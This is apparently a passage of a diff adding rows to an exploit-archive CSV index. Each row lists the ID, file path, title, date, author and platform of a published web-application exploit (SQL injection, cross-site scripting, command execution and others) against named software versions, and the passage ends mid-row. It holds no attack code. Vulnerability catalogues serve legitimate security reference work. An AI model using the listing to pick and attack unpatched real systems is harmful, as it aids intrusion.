+24475,exploits/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware, +24476,exploits/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware, +24477,exploits/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware, +24478,exploits/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware, +24480,exploits/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,webapps,php, +24481,exploits/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",webapps,php, +24483,exploits/hardware/webapps/24483.txt,"TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",webapps,hardware, +24484,exploits/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,webapps,hardware, +24520,exploits/php/webapps/24520.txt,"Piwigo 2.4.6 - '/install.php' Arbitrary File Read/Delete",2013-02-19,LiquidWorm,webapps,php, +24509,exploits/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php, +24492,exploits/php/webapps/24492.php,"OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload",2013-02-13,LiquidWorm,webapps,php, +24496,exploits/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,webapps,windows, +24497,exploits/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,webapps,hardware, +24498,exploits/hardware/webapps/24498.txt,"OpenPLI 3.0 Beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,webapps,hardware, +24499,exploits/hardware/webapps/24499.txt,"Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities",2013-02-14,m-1-k-3,webapps,hardware, +24500,exploits/windows/webapps/24500.txt,"SonicWALL OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,webapps,windows, +24501,exploits/php/webapps/24501.txt,"Ultra Light Forum - Persistent Cross-Site Scripting",2013-02-14,cr4wl3r,webapps,php, +24504,exploits/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,webapps,hardware, +24506,exploits/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,webapps,php, +24507,exploits/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",webapps,php, +24512,exploits/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php, +24513,exploits/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware, +24514,exploits/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,webapps,php, +24515,exploits/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,webapps,php, +24516,exploits/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection",2013-02-18,"Easy Laster",webapps,php, +24517,exploits/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,webapps,hardware, +24522,exploits/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,webapps,php, +24531,exploits/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,cr4wl3r,webapps,php, +24530,exploits/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,webapps,php, +24533,exploits/php/webapps/24533.txt,"RTTucson Quotations Database Script - Authentication Bypass",2013-02-21,cr4wl3r,webapps,php, +24534,exploits/windows/webapps/24534.txt,"Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection",2013-02-21,"QSecure & Demetris Papapetrou",webapps,windows, +24535,exploits/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure & Demetris Papapetrou",webapps,windows, +24536,exploits/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-21,"High-Tech Bridge SA",webapps,php, +24537,exploits/php/webapps/24537.txt,"PHPMyRecipes 1.2.2 - 'viewrecipe.php?r_id' SQL Injection",2013-02-21,cr4wl3r,webapps,php, +24540,exploits/php/webapps/24540.pl,"Brewthology 0.1 - SQL Injection",2013-02-26,cr4wl3r,webapps,php, +24542,exploits/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,webapps,php, +24543,exploits/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,webapps,ios, +24544,exploits/php/webapps/24544.txt,"MTP Image Gallery 1.0 - 'edit_photos.php?title' Cross-Site Scripting",2013-02-26,LiquidWorm,webapps,php, +24545,exploits/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,webapps,php, +24546,exploits/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,webapps,php, +24550,exploits/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,webapps,hardware, +24551,exploits/php/webapps/24551.txt,"Joomla! 3.0.2 - 'highlight.php' PHP Object Injection",2013-02-27,EgiX,webapps,php, +24552,exploits/php/webapps/24552.txt,"WordPress Plugin Comment Rating 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,webapps,php, +24560,exploits/php/webapps/24560.txt,"doorGets CMS - Cross-Site Request Forgery",2013-03-01,n0pe,webapps,php, +24561,exploits/php/webapps/24561.txt,"Piwigo 2.4.6 - Multiple Vulnerabilities",2013-03-01,"High-Tech Bridge SA",webapps,php, +24562,exploits/php/webapps/24562.txt,"PHP-Fusion 7.02.05 - Multiple Vulnerabilities",2013-03-01,waraxe,webapps,php, +24563,exploits/hardware/webapps/24563.txt,"D-Link DSL-2740B ADSL Router - Authentication Bypass",2013-03-04,"Ivano Binetti",webapps,hardware, +24564,exploits/php/webapps/24564.txt,"Nconf 1.3 - Multiple SQL Injections",2013-03-04,"Saadi Siddiqui",webapps,php, +24565,exploits/php/webapps/24565.txt,"SiteCubed MailWorks Professional - Authentication Bypass",2004-09-02,"Paul Craig",webapps,php, +24566,exploits/php/webapps/24566.txt,"CuteNews 0.88/1.3.x - 'index.php' Cross-Site Scripting",2004-09-02,Exoduks,webapps,php, +24573,exploits/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting",2004-09-04,dr_insane,webapps,multiple, +24574,exploits/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution",2004-09-07,"Keigo Yamazaki",webapps,cgi, +24575,exploits/php/webapps/24575.txt,"PSNews 1.1 - 'No' Cross-Site Scripting",2004-09-05,"Michal Blaszczak",webapps,php, +24576,exploits/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass",2004-09-07,anonymous,webapps,cgi, +24631,exploits/asp/webapps/24631.txt,"PD9 Software MegaBBS 2.0/2.1 - 'thread-post.asp' Multiple Header CRLF Injections",2004-09-27,pigrelax,webapps,asp, +24632,exploits/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 - 'ladder-log.asp' Multiple SQL Injections",2004-09-27,pigrelax,webapps,asp, +24633,exploits/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 - 'view-profile.asp' Multiple SQL Injections",2004-09-27,pigrelax,webapps,asp, +24582,exploits/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 - 'Custchoice.php' Update Your Password Action Information Disclosure",2004-09-07,masud_libra,webapps,php, +24583,exploits/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 - Customer Statistics Information Disclosure",2004-09-07,masud_libra,webapps,php, +24585,exploits/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Inclusion",2004-09-09,"Ahmad Muammar",webapps,php, +24587,exploits/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,webapps,php, +24588,exploits/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,webapps,asp, +24589,exploits/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,webapps,asp, +24591,exploits/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",webapps,cgi, +24601,exploits/php/webapps/24601.txt,"BBS E-Market Professional bf_130 1.3.0 - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",webapps,php, +24721,exploits/cgi/webapps/24721.txt,"TIPS MailPost 5.1.1 - 'APPEND' Cross-Site Scripting",2004-11-03,Procheckup,webapps,cgi, +24603,exploits/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,webapps,ios, +24604,exploits/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",webapps,asp, +24611,exploits/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",webapps,cgi, +24612,exploits/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 - YaBB.pl IMSend Cross-Site Scripting",2004-09-17,"GulfTech Security",webapps,cgi, +24613,exploits/php/webapps/24613.txt,"Remository - SQL Injection",2004-09-18,khoaimi,webapps,php, +24614,exploits/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - Cross-Site Scripting",2004-09-20,"Joxean Koret",webapps,php, +24615,exploits/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - 'Function.php' Arbitrary Command Execution",2004-09-20,"Joxean Koret",webapps,php, +24616,exploits/php/webapps/24616.txt,"TUTOS - 'file_overview.php?link_id' SQL Injection",2004-09-20,"Joxean Koret",webapps,php, +24617,exploits/php/webapps/24617.txt,"TUTOS - 'app_new.php?t' Cross-Site Scripting",2004-09-20,"Joxean Koret",webapps,php, +24625,exploits/asp/webapps/24625.txt,"FreezingCold Broadboard - 'search.asp' SQL Injection",2004-09-27,pigrelax,webapps,asp, +24626,exploits/asp/webapps/24626.txt,"FreezingCold Broadboard - 'profile.asp' SQL Injection",2004-09-27,pigrelax,webapps,asp, +24627,exploits/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,webapps,php, +24629,exploits/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",webapps,php, +24630,exploits/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",webapps,cgi, +24638,exploits/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion",2004-09-27,"Himeur Nourredine",webapps,php, +24641,exploits/php/webapps/24641.txt,"WordPress 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",webapps,php, +24642,exploits/php/webapps/24642.txt,"WordPress 1.2 - 'admin-header.php?redirect_url' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",webapps,php, +24643,exploits/php/webapps/24643.txt,"WordPress 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",webapps,php, +24644,exploits/php/webapps/24644.txt,"WordPress 1.2 - 'categories.php?cat_ID' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",webapps,php, +24645,exploits/php/webapps/24645.txt,"WordPress 1.2 - 'edit.php?s' Cross-Site Scripting",2004-09-28,"Thomas Waldegger",webapps,php, +24646,exploits/php/webapps/24646.txt,"WordPress 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities",2004-09-28,"Thomas Waldegger",webapps,php, +24647,exploits/php/webapps/24647.txt,"Parachat 5.5 - Directory Traversal",2004-09-28,"Donato Ferrante",webapps,php, +24648,exploits/php/webapps/24648.txt,"W-Agora 4.1.6 - 'a redir_url.php?key' SQL Injection",2004-09-30,"Alexander Antipov",webapps,php, +24649,exploits/php/webapps/24649.txt,"W-Agora 4.1.6 - 'a forgot_password.php?userid' Cross-Site Scripting",2004-09-30,"Alexander Antipov",webapps,php, +24650,exploits/php/webapps/24650.txt,"W-Agora 4.1.6 - 'a download_thread.php?thread' Cross-Site Scripting",2004-09-30,"Alexander Antipov",webapps,php, +24651,exploits/php/webapps/24651.txt,"W-Agora 4.1.6a - 'subscribe_thread.php' HTTP Response Splitting",2004-09-30,"Alexander Antipov",webapps,php, +24652,exploits/php/webapps/24652.txt,"W-Agora 4.1.6a - 'login.php?loginuser' Cross-Site Scripting",2004-09-30,"Alexander Antipov",webapps,php, +24655,exploits/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",webapps,php, +24657,exploits/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",webapps,php, +24659,exploits/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2004-10-06,"Alexander Antipov",webapps,php, +24660,exploits/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-10-06,"Alexander Antipov",webapps,php, +24661,exploits/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - 'announcement.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",webapps,php, +24662,exploits/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x - 'news.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",webapps,php, +24663,exploits/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x - 'contents.php?cid' Cross-Site Scripting",2004-10-06,"Alexander Antipov",webapps,php, +24664,exploits/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",webapps,php, +24665,exploits/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - 'calendar.php' HTTP Response Splitting",2004-10-06,"Alexander Antipov",webapps,php, +24666,exploits/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access",2004-10-06,anonymous,webapps,asp, +24667,exploits/php/webapps/24667.txt,"WordPress 1.2 - 'wp-login.php' HTTP Response Splitting",2004-10-07,"Chaotic Evil",webapps,php, +24670,exploits/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board - Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",webapps,asp, +24671,exploits/asp/webapps/24671.txt,"DUclassified 4.x - 'adDetail.asp' Multiple SQL Injections",2004-10-11,"Soroosh Dalili",webapps,asp, +24672,exploits/asp/webapps/24672.txt,"DUclassmate 1.x - 'account.asp?MM-recordId' Arbitrary Password Modification",2004-10-11,"Soroosh Dalili",webapps,asp, +24673,exploits/asp/webapps/24673.txt,"DUforum 3.x - Login Form 'Password' SQL Injection",2004-10-11,"Soroosh Dalili",webapps,asp, +24674,exploits/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp?FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",webapps,asp, +24675,exploits/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp?MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",webapps,asp, +24676,exploits/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting",2004-10-13,"Matthew Oyer",webapps,php, +24680,exploits/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,webapps,cfm, +24683,exploits/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - 'SettingsBase.php' Cross-Site Scripting",2004-10-14,"Secunia Research",webapps,php, +24685,exploits/php/webapps/24685.txt,"CoolPHP 1.0 - Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,webapps,php, +24689,exploits/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension - Installation Information Disclosure",2004-10-18,"Karol Wiesek",webapps,php, +24690,exploits/unix/webapps/24690.txt,"IBM Lotus Domino 6.x - Cross-Site Scripting / HTML Injection",2004-10-18,"Juan C Calderon",webapps,unix, +24692,exploits/php/webapps/24692.txt,"Jan Erdmann Jebuch 1.0 - HTML Injection",2004-10-19,PuWu,webapps,php, +24697,exploits/php/webapps/24697.txt,"S9Y Serendipity 0.x - 'exit.php' HTTP Response Splitting",2004-10-21,ChaoticEvil,webapps,php, +24698,exploits/php/webapps/24698.txt,"UBBCentral UBB.Threads 3.4/3.5 - 'Dosearch.php' SQL Injection",2004-10-21,"Florian Rock",webapps,php, +24700,exploits/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,webapps,cgi, +24702,exploits/php/webapps/24702.txt,"MoniWiki 1.0/1.1 - 'Wiki.php' Cross-Site Scripting",2004-10-25,"Jeremy Bae",webapps,php, +24703,exploits/cgi/webapps/24703.txt,"LinuxStat 2.x - Directory Traversal",2004-10-25,anonymous,webapps,cgi, +24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple, +24889,exploits/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",webapps,php, +24717,exploits/asp/webapps/24717.txt,"WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities",2004-11-02,"Behrang Fouladi",webapps,asp, +24718,exploits/php/webapps/24718.txt,"Goolery 0.3 - 'viewpic.php?conversation_id' Cross-Site Scripting",2004-11-02,Lostmon,webapps,php, +24719,exploits/php/webapps/24719.txt,"Goolery 0.3 - 'viewalbum.php?page' Cross-Site Scripting",2004-11-02,Lostmon,webapps,php, +24921,exploits/php/webapps/24921.txt,"OpenCart - Cross-Site Request Forgery (Change User Password)",2013-04-08,"Saadi Siddiqui",webapps,php, +24722,exploits/cgi/webapps/24722.txt,"TIPS MailPost 5.1.1 - Error Message Cross-Site Scripting",2004-11-03,Procheckup,webapps,cgi, +24723,exploits/cgi/webapps/24723.txt,"TIPS MailPost 5.1.1 - Remote File Enumeration",2004-11-03,"Gemma Hughes",webapps,cgi, +24729,exploits/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",webapps,php, +24731,exploits/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",webapps,php, +24732,exploits/php/webapps/24732.txt,"Phorum 5.0.x - 'FOLLOW.php' SQL Injection",2004-11-11,"Janek Vind",webapps,php, +24734,exploits/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - 'send.php?tid' Cross-Site Scripting",2004-11-12,"digital ex",webapps,php, +24735,exploits/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - 'send.php' Arbitrary Message Access",2004-11-12,"digital ex",webapps,php, +24736,exploits/php/webapps/24736.txt,"phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",webapps,php, +24737,exploits/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",webapps,php, +24739,exploits/php/webapps/24739.txt,"PowerPortal 1.3 - SQL Injection",2004-11-14,ruggine,webapps,php, +24740,exploits/hardware/webapps/24740.txt,"AirDrive HD 1.6 iPad iPhone - Multiple Vulnerabilities",2013-02-24,Vulnerability-Lab,webapps,hardware, +24742,exploits/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injections",2013-03-13,"Saadat Ullah",webapps,php, +24744,exploits/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",webapps,multiple, +24748,exploits/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",webapps,php, +24751,exploits/php/webapps/24751.pl,"phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion",2004-11-17,"Jerome Athias",webapps,php, +24752,exploits/php/webapps/24752.txt,"Invision Power Board 2.0 - 'index.php' Post Action SQL Injection",2004-11-18,anonymous,webapps,php, +24759,exploits/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",webapps,php, +24762,exploits/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,webapps,php, +24766,exploits/php/webapps/24766.txt,"Nuked-klaN 1.x - Submit Link Function HTML Injection",2004-11-23,XioNoX,webapps,php, +24768,exploits/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"James Bercegay",webapps,php, +24769,exploits/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"James Bercegay",webapps,php, +24771,exploits/php/webapps/24771.txt,"KorWeblog 1.6.2 - Remote Directory Listing",2004-11-24,"Jeremy Bae",webapps,php, +24772,exploits/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,php, +24773,exploits/jsp/webapps/24773.txt,"JSPWiki 2.1 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,jsp, +24779,exploits/cgi/webapps/24779.txt,"InShop and InMail - Cross-Site Scripting",2004-11-25,"Carlos Ulver",webapps,cgi, +24782,exploits/php/webapps/24782.txt,"phpCMS 1.1/1.2 - Cross-Site Scripting",2004-11-26,"Cyrille Barthelemy",webapps,php, +24783,exploits/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal",2004-11-26,"John Cobb",webapps,php, +24786,exploits/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple Vulnerabilities",2013-03-15,Bassem,webapps,jsp, +24789,exploits/php/webapps/24789.rb,"WordPress Plugin LeagueManager 3.8 - SQL Injection",2013-03-15,"Joshua Reynolds",webapps,php, +24790,exploits/php/webapps/24790.txt,"ClipShare 4.1.4 - Multiple Vulnerabilities",2013-03-15,AkaStep,webapps,php, +24791,exploits/java/webapps/24791.txt,"Open-Xchange Server 6 - Multiple Vulnerabilities",2013-03-15,"Martin Braun",webapps,java, +24792,exploits/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",webapps,multiple, +24796,exploits/php/webapps/24796.txt,"Blog Torrent 0.8 - Directory Traversal",2004-12-02,"Steve Kemp",webapps,php, +24797,exploits/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",webapps,php, +24798,exploits/php/webapps/24798.txt,"PAFileDB 3.1 - Error Message Full Path Disclosure",2004-12-04,y3dips,webapps,php, +24803,exploits/php/webapps/24803.txt,"Blog Torrent 0.80 - 'BTDownload.php' Cross-Site Scripting",2004-12-07,Lostmon,webapps,php, +24806,exploits/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal",2004-12-07,"John Bissell",webapps,php, +24810,exploits/php/webapps/24810.txt,"PHPGedView 2.x - 'Descendancy.php' Cross-Site Scripting",2004-01-19,JeiAr,webapps,php, +24814,exploits/php/webapps/24814.txt,"PHPGedView 2.5/2.6 - 'index.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24816,exploits/php/webapps/24816.txt,"PHPGedView 2.5/2.6 - 'Individual.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24817,exploits/php/webapps/24817.txt,"phpMyAdmin 2.x - External Transformations Remote Command Execution",2004-12-13,"Nicolas Gregoire",webapps,php, +24819,exploits/php/webapps/24819.txt,"PHPGedView 2.5/2.6 - 'Source.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24820,exploits/php/webapps/24820.txt,"PHPGedView 2.5/2.6 - 'Imageview.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24821,exploits/php/webapps/24821.txt,"PHPGedView 2.5/2.6 - 'Gedrecord.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24822,exploits/php/webapps/24822.txt,"PHPGedView 2.5/2.6 - 'Gdbi_interface.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24823,exploits/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",webapps,php, +24824,exploits/php/webapps/24824.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",webapps,php, +24825,exploits/php/webapps/24825.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",webapps,php, +24826,exploits/php/webapps/24826.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",webapps,php, +24827,exploits/php/webapps/24827.txt,"UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php?Cat' Cross-Site Scripting",2004-12-13,"dw. & ms.",webapps,php, +24829,exploits/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php?URL' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24830,exploits/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php?Username' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24831,exploits/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24832,exploits/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - 'Relationship.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24834,exploits/php/webapps/24834.txt,"PHPGedView 2.5/2.6 - 'calendar.php' Cross-Site Scripting",2004-01-12,JeiAr,webapps,php, +24835,exploits/php/webapps/24835.txt,"PHPGedView 2.5/2.6 - 'Placelist.php' SQL Injection",2004-01-12,JeiAr,webapps,php, +24836,exploits/cgi/webapps/24836.txt,"UseModWiki 1.0 - Wiki.pl Cross-Site Scripting",2004-12-14,"Jeremy Bae",webapps,cgi, +24837,exploits/php/webapps/24837.txt,"PHPGedView 2.5/2.6 - 'Timeline.php' SQL Injection",2004-01-12,JeiAr,webapps,php, +24838,exploits/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 - Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",webapps,asp, +24840,exploits/asp/webapps/24840.txt,"ASP-Rider - SQL Injection",2004-12-14,"Shervin Khaleghjou",webapps,asp, +24842,exploits/php/webapps/24842.txt,"IWebNegar - Multiple SQL Injections",2004-12-15,"Shervin Khaleghjou",webapps,php, +24844,exploits/php/webapps/24844.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-15,"James Bercegay",webapps,php, +24845,exploits/php/webapps/24845.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' Cross-Site Scripting",2004-12-15,"James Bercegay",webapps,php, +24846,exploits/php/webapps/24846.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection",2004-12-15,"James Bercegay",webapps,php, +24847,exploits/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple SQL Injections",2004-12-15,"James Bercegay",webapps,php, +24849,exploits/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",webapps,php, +24850,exploits/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,webapps,php, +24851,exploits/php/webapps/24851.txt,"Joomla! Component com_rsfiles - 'cid' SQL Injection",2013-03-18,ByEge,webapps,php, +24858,exploits/php/webapps/24858.html,"WordPress Plugin Occasions 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,webapps,php, +24859,exploits/php/webapps/24859.rb,"WordPress Plugin Count Per Day 3.2.5 - 'counter.php' Cross-Site Scripting",2013-03-19,m3tamantra,webapps,php, +24860,exploits/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request 